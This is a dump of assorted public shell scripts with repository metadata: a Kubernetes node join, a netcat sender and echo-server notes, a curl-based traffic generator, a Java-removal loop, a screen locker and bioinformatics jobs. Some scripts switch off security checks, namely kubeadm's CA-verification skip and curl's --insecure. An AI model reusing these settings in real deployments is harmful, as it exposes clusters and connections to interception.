'-o[Column]:number:_values -s , "column" $hist_columns' \
'-t[Time range]'
;;
("freeze"|"unfreeze")
;;
("mediator"|"set-mediator"|"unset-mediator")
;;
(*)
_message "unknown pkg subcommand: $service" ;;
esac
}
_pkg5 "$@"
# vim:ft=zsh
| true
|
94ec34271d8a2da89e15068eb149a39bf92f7466
|
Shell
|
ivucica/advent-of-code-2017
|
/day2/day2_test.sh
|
UTF-8
| 332
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
if [[ -nz "${TEST_SRCDIR}" ]]; then
BIN="${TEST_SRCDIR}"/"${TEST_WORKSPACE}"/day2/day2
else
BIN="$(dirname "$0")/day2"
fi
_failed=0
_out="$("${BIN}" << _EOF
5 1 9 5
7 5 3
2 4 6 8)"
if [[ ${_out} != 18 ]] ; then
echo "expected = 18, got = ${_out}"
_failed=1
fi
if [[ ${_failed} == 1 ]] ; then
exit 1
fi
| true
|
f385c5d9809d4d32cc35c1c54cbf5c0bd3f318bc
|
Shell
|
xuyueshu/YZQREPO
|
/shell_test/uninstall_java.sh
|
UTF-8
| 297
| 3.21875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
##脚本删除linux系统中自带jdk
while :
do
file=`rpm -qa | grep java`
length=${#file[@]}
if [ $length -gt 0 ];then
yum remove -y ${file[0]}
else
echo "删除完毕!"
break
fi
done
ps -auxf | grep 'uninstall_java.sh' | grep -v grep | awk '{print $2}'| xargs kill -9
| true
|
16f5cfc13c5975b47beef3ab8df1aa13939dd4e9
|
Shell
|
misterwavey/nxtmail
|
/server/sender.sh
|
UTF-8
| 228
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
for i in "$@"
do
echo $i
n=`printf "\x%1x" $i`
var=$var$n
done
echo "var is now $var"
#gnu-netcat
echo -en "$var" | timeout 1 nc -x 127.0.0.1 8080
#openbsd-netcat
#echo -en "$var" | timeout 1 nc 127.0.0.1 8080
| true
|
624da860d9e4a89a6c8264247ac25fa8d919baa5
|
Shell
|
thombowles/trafficgen
|
/trafficgen.sh
|
UTF-8
| 1,238
| 3.8125
| 4
|
[] |
no_license
|
#!/bin/bash
# generate network traffic by using curl(ing) desturl from a range of IP addresses
# v1.1 - added cidr support
SECONDS=0 # dont change - used for figuring script run time
# user configurable vars:
desturl=google.com
network=192.168.20.
cidr=24
firstIP=240
lastIP=250
repeat=20
interface=ens192
# space-separated list of ports
ports=(80)
for itteration in $(seq 1 $repeat); do
for ip in $(seq $firstIP $lastIP); do
#echo ===========
#echo LOOP $itteration
#echo ===========
# make sure the alias is not already configured
sudo ifconfig $interface:$ip down
# create the alias
sudo ifconfig $interface:$ip $network$ip/$cidr up
# curl to desturl on each port from alias ip
for i in ${ports[@]}; do
echo =========================================================
echo REPEAT $itteration
echo SENDING TRAFFIC TO $desturl:$i FROM $network$ip
echo =========================================================
curl --interface $interface:$ip $desturl:$i --insecure
sleep 1
done
# tear down the alias
sudo ifconfig $interface:$ip down
done
done
duration=$SECONDS
echo -----------------
echo FINISHED in $(($duration / 60))m $(($duration % 60))s
echo -----------------
| true
|
3c2b1714a6edccf6cc71d753550b415bca8e51f2
|
Shell
|
acoutoal/rnaseq
|
/script_flagstat_worker.sh
|
UTF-8
| 1,822
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
# partition (queue)
#SBATCH -N 1
# number of nodes
#SBATCH -n 1
# number of cores
#SBATCH --mem 100G
echo "##################################################################"
echo FLAGSTAT Worker
echo Running on host `hostname`
echo Time is `date`
echo Directory is `pwd`
echo Running shell from $SHELL
echo "##################################################################"
echo $0 $1;echo;echo
line=$1
echo $line;echo
PATH=$PATH:/media/shared_data/software/QTLtools_1.0
GTFFILE=/media/shared_data/data/gencode.v19.annotation.gtf
THREAD_NO=4
#line=21
#indir=/media/shared_data/data/adipose_out/$line/reference
#indir=/media/shared_data/data/skin_out/$line/reference
#indir=/media/shared_data/data/LCL_out/$line/reference
indir=/media/shared_data/data/blood_out/$line/reference
#outdir=/media/shared_data/alex/proj/exonquant/results/adipose
#outdir=/media/shared_data/alex/proj/exonquant/results/skin
#outdir=/media/shared_data/alex/proj/exonquant/results/lcl
outdir=/media/shared_data/alex/proj/exonquant/results/blood
mytemp=/tmp/alex
#Print current dir
echo "Current dir: "`pwd`
echo "Input dir: "$indir
echo "Output dir: "$outdir
echo "Input file: "$indir/$line'_ref.Aligned.sortedByCoord.out.bam'
echo "Output file: "$outdir/$line/reference/$line'.flagstat'
#wait between 1-5s before moving data around the cluster
sleep $(( ( RANDOM % 3 ) + 1 ))
#Copy files to tmp dir
samtools flagstat $indir/$line'_ref.Aligned.sortedByCoord.out.bam' > $outdir/$line/reference/$line'.flagstat'
#Job statistics
echo `sstat --format=AveCPU,MaxRSS,MaxVMSize,JobID -j $SLURM_JOB_ID`
echo "##################################################################"
echo Finished running script on host `hostname`
echo Time is `date`
echo "##################################################################"
| true
|
6fcfc651bbe1b812dc466561912de76bed574d18
|
Shell
|
AprilOneDay/k8s
|
/install/install-node.sh
|
UTF-8
| 405
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
TOKEN=$1
MASTER_IP=$2
if [ ! $TOKEN ]; then
echo 'error:plase input [ $1 ] -- 请输入[ TOKEN ]'
exit
fi
if [ ! $MASTER_IP ]; then
echo 'error:plase input [ $2 ] -- 请输入[ MASTER_IP:prot ]'
exit
fi
kubeadm join --token ${TOKEN} ${MASTER_IP} --discovery-token-unsafe-skip-ca-verification
# 安装nfs客服端
yum -y install nfs-utils
systemctl start nfs && systemctl enable nfs
| true
|
f3ac65a30e83fae97a189708c091c0b951439230
|
Shell
|
acloserview/mantablockscreen
|
/mantablockscreen.in
|
UTF-8
| 5,673
| 3.34375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/env bash
wallpaper=$2
cachepath=$HOME/.cache/mantablockscreen
cropuser=$cachepath/$USER-pic-crop.png
fullname=`getent passwd $USER | cut -d ":" -f 5 | cut -d "," -f 1`
full_alias="${fullname} (${USER})"
if [[ -n $fullname ]]; then
full_alias="${fullname} (${USER})"
else
full_alias=$USER
fi
width=$(xrandr --query | grep ' connected' | grep -o '[0-9][0-9]*x[0-9][0-9]*[^ ]*' | sed -r 's/^[^0-9]*([0-9]+x[0-9]+).*$/\1/' |cut -d "x" -f 1 |head -n1)
height=$(xrandr --query | grep ' connected' | grep -o '[0-9][0-9]*x[0-9][0-9]*[^ ]*' | sed -r 's/^[^0-9]*([0-9]+x[0-9]+).*$/\1/' |cut -d "x" -f 2 |head -n1)
half_width=$((width/2))
half_height=$((height/2))
fg_color=fefefeff
wrong_color=f82a11aa
highlight_color=39393999
verif_color=fefefe66
cropuser() {
ava_home=$HOME/.face
ava_var=/var/lib/AccountsService/icons/$USER
userpic=@pkgdatadir@/userpic.png
if [[ -e $ava_home ]]; then
userpic=$ava_home
elif [[ -e $ava_var ]]; then
userpic=$ava_var
fi
convert $userpic -resize 100x100 -gravity Center \( \
-size 100x100 xc:Black \
-fill White \
-draw "circle 50 50 50 1" \
-alpha Copy\
\) -compose CopyOpacity -composite -trim $cropuser
}
cropbg() {
convert "$wallpaper" -resize ${width}x -gravity center -crop ${width}x${height}+0+0 +repage \( \
-size 120x140 xc:none \
\) -gravity south -compose over -composite $cachepath/resize.png
}
blurbg() {
convert "$cachepath/resize.png" \
-filter Gaussian \
-blur 0x8 \
"$cachepath/resize-blur.png"
}
genbg() {
echo "Caching image ..."
if [[ ! -d $HOME/.cache/mantablockscreen ]]; then
mkdir $HOME/.cache/mantablockscreen
fi
cropuser
cropbg
blurbg
composite -geometry "+$((half_width-50))+$((half_height-130))" $cropuser $cachepath/resize-blur.png $cachepath/resize-pic-blur.png
composite -geometry "+$((half_width-50))+$((half_height+10))" $cropuser $cachepath/resize-blur.png $cachepath/resize-pic-sc-blur.png
echo "Finished caching image"
}
slowfade () {
dis=$(echo -n "$DISPLAY" | tr -c '[:alnum:]' _)
ifc='com.github.chjj.compton'
obj='/com/github/chjj/compton'
if [[ "$1" == "start" ]]; then
dbus-send --print-reply --dest=$ifc.$dis \
$obj $ifc.opts_set string:fade_in_step double:0.02
dbus-send --print-reply --dest=$ifc.$dis \
$obj $ifc.opts_set string:fade_out_step double:0.02
else
dbus-send --print-reply --dest=$ifc.$dis \
$obj $ifc.opts_set string:fade_in_step double:0.1
dbus-send --print-reply --dest=$ifc.$dis \
$obj $ifc.opts_set string:fade_out_step double:0.1
fi
}
lock() {
slowfade start
i3lock -n --force-clock -i $cachepath/resize-pic-blur.png \
--ind-pos="w/2:h/2+60" --time-pos="w-100:h-70" --date-pos="w-115:h-40" --greeter-pos="w/2:h/2" \
--insidever-color=$fg_color --insidewrong-color=$wrong_color --inside-color=fefefe00 \
--ringver-color=$verif_color --ringwrong-color=$wrong_color --ring-color=$fg_color \
--keyhl-color=$highlight_color --bshl-color=$highlight_color --separator-color=00000000 \
--date-color=$fg_color --time-color=$fg_color --greeter-color=$fg_color \
--time-str="%H:%M" --time-size=50 \
--date-str="%a, %b %d" --date-size=30 \
--greeter-text="$full_alias" --greeter-size=25\
--line-uses-ring \
--radius 38 --ring-width 3 --indicator \
--verif-text="" --wrong-text="" --noinput-text="" \
--clock --date-font="SF Pro Display" --time-font="SF Pro Display"
sleep 1
slowfade end
}
stackclock() {
slowfade start
date_now=$(date +'%b, %d')
i3lock -n --force-clock -i $cachepath/resize-pic-sc-blur.png \
--ind-pos="w/2:h/2+60" --time-pos="w/2:h/2-100" --date-pos="w/2:h/2-30" --greeter-pos="w/2:h/2" \
--insidever-color=$verif_color --insidewrong-color=$wrong_color --inside-color=fefefe00 \
--ringver-color=$verif_color --ringwrong-color=$wrong_color --ring-color=$fg_color \
--keyhl-color=$highlight_color --bshl-color=$highlight_color --separator-color=00000000 \
--date-color=$fg_color --time-color=$fg_color --greeter-color=$fg_color \
--time-str="%H" --time-size=70 \
--date-str="%M" --date-size=70 \
--greeter-text="$date_now" --greeter-size=25\
--line-uses-inside --radius 50 --ring-width 2 --indicator \
--verif-text="" --wrong-text="" --noinput-text="" \
--clock --date-font="Abel" --time-font="Abel"
sleep 1
slowfade end
}
circleclock() {
slowfade start
i3lock -n --force-clock -i $cachepath/resize-blur.png \
--ind-pos="w/2:h/2" --time-pos="w/2:h/2-5" --date-pos="w/2:h/2+35" --greeter-pos="w/2:h/2" \
--insidever-color=5f5f5f66 --insidewrong-color=$wrong_color --inside-color=5f5f5f66 \
--ringver-color=$verif_color --ringwrong-color=$wrong_color --ring-color=$fg_color \
--keyhl-color=$highlight_color --bshl-color=$highlight_color --separator-color=00000000 \
--date-color=$fg_color --time-color=$fg_color --greeter-color=$fg_color \
--time-str="%H | %M" --time-size=40 \
--date-str="%a, %d %b" --date-size=25 \
--greeter-text="$date_now" --greeter-size=25 \
--line-uses-inside --radius 75 --ring-width 2 --indicator \
--verif-text="" --wrong-text="" --noinput-text="" \
--clock --date-font="Abel" --time-font="Abel"
sleep 1
slowfade end
}
show_help(){
cat <<-EOF
Usage :
mantablockscreen [OPTION]
Avaible options:
-i, --image Generate cache image
-sc, --stackclock Show lockscreen with stacked digital clock
-cc, --circleclock Show lockscreen with clock inside circle
-h, --help Show this help
EOF
}
case $1 in
-i|--image)
genbg $2 ;;
-h|--help)
show_help ;;
-sc|--stackclock)
stackclock ;;
-cc|--circleclock)
circleclock ;;
*)
lock ;;
esac
| true
|
f9a5108af9bb485de53692d80efaaf2576361427
|
Shell
|
pablogonz/Echoserver-lorenzo
|
/echoslorenzo.sh
|
UTF-8
| 793
| 2.609375
| 3
|
[] |
no_license
|
#Eejercicios 1 y 2 de la tarea de scokets
# 1) Echo server y client con 2 consolas
# OjO: Se debe instalar instalar netcat para que esa 100% funcional, para ello se utiliza el codigo siguiente: sudo apt-get install netcat
#En la primera consola(server) se inserta el siguiente comando
nc -l -p 5353
#el puerto 5353 es uno de lo que tiene mi ordenador, debe asegurarse de utilizar uno de los de su ordenador
# En la segunda consola(client) se introduce el siguiente comando
nc localhost 5353
#Despues de establecer estos 2 pasos ya sera posible entablar una comunciacion entre el servidor y el cliente
#2) Leer una url de una pagina publica
#en este caso utilizamos tcp
exec 3<>/dev/tcp/youtube.com/80
echo -e "GET / HTTP/1.1\nHost: youtube.com\n\n" >&3
cat <&3
| true
|
19ff53de15587826eb2d067f50f22f6c6c8ef688
|
Shell
|
germanfica/MacOS-ZSHTM
|
/install.sh
|
UTF-8
| 415
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
RED="\033[1;31m"
GREEN="\033[1;32m"
NOCOLOR="\033[0m"
# Copiamos el config
cp .zshrc ~
# Descargamos .git-prompt.sh
curl https://raw.githubusercontent.com/git/git/master/contrib/completion/git-prompt.sh --output .git-prompt.sh
# Le modificamos los permisos
chmod +x-w .git-prompt.sh
# Lo movemos a la raíz
mv .git-prompt.sh ~
echo [100%] "${GREEN}Instalación exitosa"
# Reiniciamos la consola
exec zsh
| true
|
c41f1dd2aa0ec9a19c2e22edb18f73134adfe445
|
Shell
|
pjlintw/Meta-BERT
|
/scripts/meta_exps_2.sh
|
UTF-8
| 374
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/sh
# Run meta-training script`
for num_domain in 1 3 5 50;
do
for num_task in 100;
do
echo "Execute meta-training script with ${num_task} training tasks from ${num_domain} domains."
python run_meta_training.py \
--output_dir results/meta.nt-$num_task.nd-$num_domain \
--num_train_task $num_task \
--num_domain $num_domain \
--gpu_id 2
done
done
| true
|
26453185005ca791deb2ee9532da4b301f16a284
|
Shell
|
cloux/runit
|
/debian/contrib/3
|
UTF-8
| 414
| 2.96875
| 3
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
exec 2>&1
PATH=/sbin:/usr/sbin:/bin:/usr/bin
LAST=0
# While test -x is more natural, it does not consider file with
# executable bit set on 'noexec' filesystem as executable, and /run
# often is mounted as 'noexec'.
[ $(stat -c %a /run/runit.reboot) = 100 ] && LAST=6
echo 'Waiting for services to stop...'
sv force-stop /etc/service/*
sv exit /etc/service/*
echo 'Shutdown...'
/etc/init.d/rc $LAST
| true
|
b47607cd6f7af2545f7ab06088f10ff52d2aa2d3
|
Shell
|
rakibulislam01/bash-scripting
|
/2_script_input_stdin.sh
|
UTF-8
| 281
| 3.3125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# for permission use: chmod +x script_2.sh
#6-Script input
# shellcheck disable=SC2016
: '
#echo $1 $2 $2
args=("$@") # for multiple input
echo "${args[0]}"
echo "$@"
echo "$#" # length of the array
'
while read line; do
echo "$line"
done < "${1:-/dev/stdin}"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.